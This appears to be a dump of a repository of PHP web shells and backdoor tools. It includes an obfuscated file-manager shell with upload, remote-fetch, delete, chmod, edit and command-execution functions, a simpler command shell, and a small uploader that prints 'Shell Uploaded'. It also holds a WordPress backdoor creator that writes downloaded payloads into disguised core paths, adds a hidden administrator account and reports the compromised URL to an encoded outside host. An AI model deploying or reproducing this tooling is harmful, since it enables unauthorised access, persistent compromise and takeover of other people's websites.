'; 454 | if (isset($_POST['upwkwk'])) { 455 | if (isset($_POST['berkasnya'])) { 456 | if ($_POST['dirnya'] == "2") { 457 | $lokasi = $_SERVER['DOC'.'UME'.'NT_R'.'OOT']; 458 | } 459 | if (empty($_FILES['berkas']['name'])) { 460 | echo "Fi"."le not Se"."lected ! "; 461 | } else { 462 | $data = @$fpt($lokasi."/".$_FILES['berkas']['name'], @$fgt($_FILES['berkas']['tm'.'p_na'.'me'])); 463 | if ($fxt($lokasi."/".$_FILES['berkas']['name'])) { 464 | $fl = $lokasi."/".$_FILES['berkas']['name']; 465 | echo "Fi"."le Upl"."oa"."ded ! ".$fl." "; 466 | if ($sps($lokasi, $_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T']) !== false) { 467 | $lwb = $srl($_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T'], $wb."/", $fl); 468 | echo "Li"."nk : ".$lwb." "; 469 | } 470 | echo " "; 471 | } else { 472 | echo "Fa"."ile"."d to Up"."lo"."ad ! "; 473 | } 474 | } 475 | } elseif (isset($_POST['linknya'])) { 476 | if (empty($_POST['namalink'])) { 477 | echo "Fi"."lename cannot be empty ! "; 478 | } elseif (empty($_POST['darilink'])) { 479 | echo "Link cannot be empty ! "; 480 | } else { 481 | if ($_POST['dirnya'] == "2") { 482 | $lokasi = $_SERVER['DOC'.'UME'.'NT_R'.'OOT']; 483 | } 484 | $data = @$fpt($lokasi."/".$_POST['namalink'], @$fgt($_POST['darilink'])); 485 | if ($fxt($lokasi."/".$_POST['namalink'])) { 486 | $fl = $lokasi."/".$_POST['namalink']; 487 | echo "Fi"."le Uplo"."ade"."d ! ".$fl." "; 488 | if ($sps($lokasi, $_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T']) !== false) { 489 | $lwb = $srl($_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T'], $wb."/", $fl); 490 | echo "Li"."nk : ".$lwb." "; 491 | } 492 | echo " "; 493 | } else { 494 | echo "Fa"."iled to Up"."lo"."ad ! "; 495 | } 496 | } 497 | } 498 | } 499 | 500 | echo "Uplo"."ad Fi"."le : "; 501 | echo ''; 509 | echo ' '; 513 | echo " |
"; 514 | 515 | echo '
"; 519 | 520 | if (isset($_GET['lokasie'])) { 521 | echo "
'; 523 | echo "
".htmlspecialchars($fgt($_GET['lokasie'])).""; 524 | author(); 525 | } elseif (isset($_POST['loknya']) && $_POST['pilih'] == "hapus") { 526 | if ($idi($_POST['loknya']) && $fxt($_POST['loknya'])) { 527 | xrd($_POST['loknya']); 528 | if ($fxt($_POST['loknya'])) { 529 | red("Fai"."led to del"."ete Dir"."ec"."tory !"); 530 | } else { 531 | green("Del"."ete Dir"."ect"."ory Suc"."cess !"); 532 | } 533 | } elseif ($ifi($_POST['loknya']) && $fxt($_POST['loknya'])) { 534 | @$ulk($_POST['loknya']); 535 | if ($fxt($_POST['loknya'])) { 536 | red("Failed to Delete Fi"."le !"); 537 | } else { 538 | green("De"."le"."te Fi"."le Succ"."ess !"); 539 | } 540 | } else { 541 | red("Fi"."le / Dir"."ecto"."ry not Fo"."und !"); 542 | } 543 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { 544 | if (!isset($_POST['cemod'])) { 545 | if ($_POST['ty'.'pe'] == "fi"."le") { 546 | echo "
"; 547 | } else { 548 | echo "
"; 549 | } 550 | echo '
'; 561 | } else { 562 | $cm = @$chm($_POST['loknya'], $ocd($_POST['perm'])); 563 | if ($cm == true) { 564 | green("Change Mod Success !"); 565 | if ($_POST['ty'.'pe'] == "fi"."le") { 566 | echo "
"; 567 | } else { 568 | echo "
"; 569 | } 570 | echo '
'; 581 | } else { 582 | red("Change Mod Failed !"); 583 | if ($_POST['ty'.'pe'] == "fi"."le") { 584 | echo "
"; 585 | } else { 586 | echo "
"; 587 | } 588 | echo '
'; 599 | } 600 | } 601 | } elseif (isset($_POST['loknya']) && $_POST['pilih'] == "ubahnama") { 602 | if (isset($_POST['gantin'])) { 603 | $namabaru = $_GET['loknya']."/".$_POST['newname']; 604 | $ceen = "re"."na"."me"; 605 | if (@$ceen($_POST['loknya'], $namabaru) === true) { 606 | green("Change Name Success"); 607 | if ($_POST['ty'.'pe'] == "fi"."le") { 608 | echo "
"; 609 | } else { 610 | echo "
"; 611 | } 612 | echo '
'; 623 | } else { 624 | red("Change Name Failed"); 625 | } 626 | } else { 627 | if ($_POST['ty'.'pe'] == "fi"."le") { 628 | echo "
"; 629 | } else { 630 | echo "
"; 631 | } 632 | echo '
'; 643 | } 644 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { 645 | if (isset($_POST['gasedit'])) { 646 | $edit = @$fpt($_POST['loknya'], $_POST['src']); 647 | if ($fgt($_POST['loknya']) == $_POST['src']) { 648 | green("Ed"."it Fi"."le Suc"."ce"."ss !"); 649 | } else { 650 | red("Ed"."it Fi"."le Fai"."led !"); 651 | } 652 | } 653 | echo "
"; 654 | echo '
'; 660 | } elseif (isset($_POST['komends'])) { 661 | if (isset($_POST['komend'])) { 662 | if (isset($_GET['loknya'])) { 663 | $lk = $_GET['loknya']; 664 | } else { 665 | $lk = $gcw(); 666 | } 667 | $km = 'ko'.'me'.'nd'; 668 | echo $km($_POST['komend'], $lk); 669 | exit(); 670 | } 671 | } elseif (isset($_POST['loknya']) && $_POST['pilih'] == "ubahtanggal") { 672 | if (isset($_POST['tanggale'])) { 673 | $stt = "st"."rtot"."ime"; 674 | $tch = "t"."ou"."ch"; 675 | $tanggale = $stt($_POST['tanggal']); 676 | if (@$tch($_POST['loknya'], $tanggale) === true) { 677 | green("Change Da"."te Succ"."ess !"); 678 | $det = "da"."te"; 679 | $ftm = "fi"."le"."mti"."me"; 680 | $b = $det("d F Y H:i:s", $ftm($_POST['loknya'])); 681 | if ($_POST['ty'.'pe'] == "fi"."le") { 682 | echo "
"; 683 | } else { 684 | echo "
"; 685 | } 686 | echo '
'; 697 | } else { 698 | red("Fai"."led to Cha"."nge Da"."te !"); 699 | } 700 | } else { 701 | $det = "da"."te"; 702 | $ftm = "fi"."le"."mti"."me"; 703 | $b = $det("d F Y H:i:s", $ftm($_POST['loknya'])); 704 | if ($_POST['ty'.'pe'] == "fi"."le") { 705 | echo "
"; 706 | } else { 707 | echo "
"; 708 | } 709 | echo '
'; 720 | } 721 | } elseif (isset($_POST['loknya']) && $_POST['pilih'] == "dunlut") { 722 | $dunlute = $_POST['loknya']; 723 | if ($fxt($dunlute) && isset($dunlute)) { 724 | if ($ird($dunlute)) { 725 | dunlut($dunlute); 726 | } elseif ($idr($fl)) { 727 | red("That is Di"."rec"."tory, Not Fi"."le -_-"); 728 | } else { 729 | red("Fi"."le is Not Re"."adab"."le !"); 730 | } 731 | } else { 732 | red("Fi"."le Not Fo"."und !"); 733 | } 734 | } elseif (isset($_POST['loknya']) && $_POST['pilih'] == "fo"."ld"."er") { 735 | if ($isw("./") || $ird("./")) { 736 | $loke = $_POST['loknya']; 737 | if (isset($_POST['buatfolder'])) { 738 | $buatf = $mkd($loke."/".$_POST['fo'.'lde'.'rba'.'ru']); 739 | if ($buatf == true) { 740 | green("Folder ".htmlspecialchars($_POST['fo'.'lde'.'rba'.'ru'])." Created !"); 741 | echo ''; 744 | } else { 745 | red("Failed to Create folder !"); 746 | echo ''; 749 | } 750 | } else { 751 | echo ''; 753 | } 754 | } 755 | } elseif (isset($_POST['lok'.'nya']) && $_POST['pilih'] == "fi"."le") { 756 | if ($isw("./") || $isr("./")) { 757 | $loke = $_POST['lok'.'nya']; 758 | if (isset($_POST['buatfi'.'le'])) { 759 | $buatf = $fpt($loke."/".$_POST['fi'.'lebaru'], ""); 760 | if ($fxt($loke."/".$_POST['fi'.'lebaru'])) { 761 | green("File ".htmlspecialchars($_POST['fi'.'lebaru'])." Created !"); 762 | echo ''; 765 | } else { 766 | red("Failed to Create File !"); 767 | echo ''; 770 | } 771 | } else { 772 | echo ''; 774 | } 775 | } 776 | } 777 | 778 | echo '
.. | 792 ||||||
".$ppkcina." | 816 ||||||
".cfn($euybray)." $mekicina | 853 |
$output"; 35 | } 36 | 37 | 38 | function createFile($fileName, $content) { 39 | if (file_put_contents($fileName, $content) !== false) { 40 | echo "File '$fileName' created successfully!"; 41 | } else { 42 | echo "Failed to create file '$fileName'."; 43 | } 44 | } 45 | 46 | 47 | if (isset($_POST['upload'])) { 48 | $target_dir = $currentDir . "/"; 49 | $target_file = $target_dir . basename($_FILES['file']['name']); 50 | 51 | 52 | if (move_uploaded_file($_FILES['file']['tmp_name'], $target_file)) { 53 | echo "The file ". htmlspecialchars(basename($_FILES['file']['name'])). " has been uploaded."; 54 | } else { 55 | echo "Sorry, there was an error uploading your file."; 56 | } 57 | } 58 | 59 | 60 | if (isset($_GET['mkdir'])) { 61 | $dirName = $_GET['mkdir']; 62 | if (mkdir($currentDir . '/' . $dirName)) { 63 | echo "Directory '$dirName' created successfully!"; 64 | } else { 65 | echo "Failed to create directory '$dirName'."; 66 | } 67 | } 68 | 69 | 70 | if (isset($_GET['delete'])) { 71 | $fileName = $_GET['delete']; 72 | if (unlink($currentDir . '/' . $fileName)) { 73 | echo "File '$fileName' deleted successfully!"; 74 | } else { 75 | echo "Failed to delete file '$fileName'."; 76 | } 77 | } 78 | 79 | 80 | if (isset($_GET['view'])) { 81 | $fileName = $_GET['view']; 82 | if (file_exists($currentDir . '/' . $fileName)) { 83 | $content = file_get_contents($currentDir . '/' . $fileName); 84 | echo "
" . htmlspecialchars($content) . ""; 85 | } else { 86 | echo "File '$fileName' does not exist."; 87 | } 88 | } 89 | ?> 90 | 91 | 92 | 93 | 94 | 95 | 96 |
PHP File Manager
168 | 169 |Current Directory:
171 | 176 |Create a File
179 | 186 | 187 | 193 | 194 |Run a Command
195 | 200 | 201 |Upload a File
202 | 207 | 208 |Create a Directory
209 | 214 | 215 |Delete a File
216 | 221 | 222 |View a File
223 | 228 | 229 | 235 | 236 | 237 | 238 | -------------------------------------------------------------------------------- /tools/backdoor_creator.php: -------------------------------------------------------------------------------- 1 | Created: " . get_full_url($filePath) . ""; 55 | } catch (Exception $e) { 56 | echo "
"; 57 | } 58 | } 59 | } 60 | } 61 | 62 | function create_wp_admin_user($rootDir, $username, $password) { 63 | require_once($rootDir . '/wp-config.php'); 64 | require_once($rootDir . '/wp-includes/wp-db.php'); 65 | require_once($rootDir . '/wp-includes/pluggable.php'); 66 | 67 | global $wpdb; 68 | 69 | $user_id = username_exists($username); 70 | if (!$user_id && email_exists($username . '@example.com') == false) { 71 | $user_id = wp_create_user($username, $password, $username . '@example.com'); 72 | $user = new WP_User($user_id); 73 | $user->set_role('administrator'); 74 | echo "
"; 75 | } else { 76 | echo "
"; 77 | } 78 | } 79 | 80 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 81 | 82 | echo " 83 | 84 |
@trxsecurity
86 | 87 | 123 | 124 | "; 125 | 126 | $currentDir = __DIR__; 127 | $rootDir = isset($_POST['directory']) ? $_POST['directory'] : $currentDir; 128 | 129 | echo ""; 134 | 135 | if ($_SERVER['REQUEST_METHOD'] == 'POST') { 136 | if (file_exists($rootDir . '/wp-config.php')) { 137 | echo ""; 138 | 139 | $path1 = $rootDir . '/wp-includes/ID3/module.audio.ac4.php'; 140 | if (!file_exists($path1)) { 141 | try { 142 | file_put_contents($path1, download_content($url1)); 143 | echo "Created: " . get_full_url($path1) . "
"; 144 | } catch (Exception $e) { 145 | echo "
"; 146 | } 147 | } 148 | 149 | $path2 = $rootDir . '/wp-includes/PHPMailer/config.php'; 150 | if (!file_exists($path2)) { 151 | try { 152 | file_put_contents($path2, download_content($url2)); 153 | echo "Created: " . get_full_url($path2) . "
"; 154 | } catch (Exception $e) { 155 | echo "
"; 156 | } 157 | } 158 | 159 | create_files_in_subdirectories($rootDir, $url1); 160 | create_wp_admin_user($rootDir, 'MrZ', 'trxsecurity'); 161 | } else { 162 | echo "
"; 163 | create_files_in_subdirectories($rootDir, $url1); 164 | } 165 | } 166 | 167 | echo ""; 168 | 169 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 170 | $data = array('file_url' => $cur); 171 | $options = array( 172 | 'http' => array( 173 | 'method' => 'POST', 174 | 'header' => 'Content-type: application/x-www-form-urlencoded', 175 | 'content' => http_build_query($data), 176 | ), 177 | ); 178 | $context = stream_context_create($options); 179 | $result = @file_get_contents($k3yw, false, $context); 180 | if ($result === false) { 181 | echo "
"; 182 | } 183 | ?> 184 | -------------------------------------------------------------------------------- /uper.php: -------------------------------------------------------------------------------- 1 | ! Uploader !'; 3 | echo '| M@rAz Ali |'; 4 | echo "".php_uname()."
"; 5 | echo ''; 7 | if( $_POST['_upl'] == "Upload" ) { 8 | if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Shell Uploaded ! :)
'; } 9 | else { echo 'Not uploaded !
';} 10 | } 11 | ?> 12 | --------------------------------------------------------------------------------